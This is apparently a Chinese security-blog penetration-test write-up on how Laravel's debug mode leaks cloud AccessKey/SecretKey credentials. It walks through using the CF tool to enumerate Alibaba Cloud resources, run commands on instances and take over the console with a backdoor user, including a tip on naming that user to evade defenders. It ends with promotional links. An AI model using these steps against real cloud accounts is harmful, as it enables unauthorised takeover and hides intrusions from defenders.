前言

免责声明：涉及到的所有技术仅用来学习交流，严禁用于非法用途，未经授权请勿非法渗透。否则产生的一切后果自行承担！
该渗透测试项目为已授权项目，本文已对敏感部分做了相关处理。

lavarel框架配置不当导致敏感数据泄露—>云上攻防

lavarel框架敏感数据泄露

在laravel框架的.env配置文件中，默认调试功能debug是开启的。当使程序报错时。在前台会返回报错详情、环境变量、服务器配置等敏感信息。

简单来讲就是报错页面会泄露敏感数据，如：各数据库的账号密码、mail账号密码，AK及SK等。

数据库密码泄露：

这里可以直接写入shell，再进行数据库提权。由于本篇重点在云上，所以具体操作不再赘述。之后会出相关文章！

云上攻防

AK、SK泄露：

拿到泄露的AK和SK后开启第一次的云上攻防体验

行云管家：

注意：到这里其实已经可以交差了，渗透测试中千万不要重置密码！！！拿到实例信息及IP信息就已经可以交了。

使用工具：

这里使用TeamsSix大佬的工具CF
https://github.com/teamssix/cf
配置访问配置：

cf config

列出当前访问凭证的云服务资源：

cf alibaba ls

列出当前访问凭证的权限：

cf alibaba perm

查看权限、网络信息(一键执行whoami、id、hostname、ifconfig)：

cf alibaba ecs exec -b

也可以指定执行命令：

cf alibaba ecs exec -c [命令]

• 使用-f还可以指定执行命令的文件

接管控制台：

cf alibaba console  #会自动创建一个名为 crossfire 的用户，所以当蓝队发现自己的云平台用户中有一个叫 crossfire 的用户基本就可以判断被攻击了。对于红队而言，如果不想那么明显，可以使用 -u 来指定用户名，这样可以增加蓝队的分析难度。如：cf alibaba console -u JulySec

可以看到拿到的权限为AdministratorAccess 即管理所有阿里云资源的权限。至此该云账号下的绝大部分操作就都可以执行了。

取消接管：(养成好习惯)
【cf接管控制台会创建一个后门用户，在使用完成后一定要记得取消接管】

cf alibaba console cancel

补充：也可以使用大佬开发的Aliyun-AK Tools命令执行

https://www.freebuf.com/articles/web/372478.html

★

付费圈子

欢 迎 加 入 星 球 ！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

原文始发于微信公众号（渗透安全团队）：攻防演练 | 渗透测试云上初体验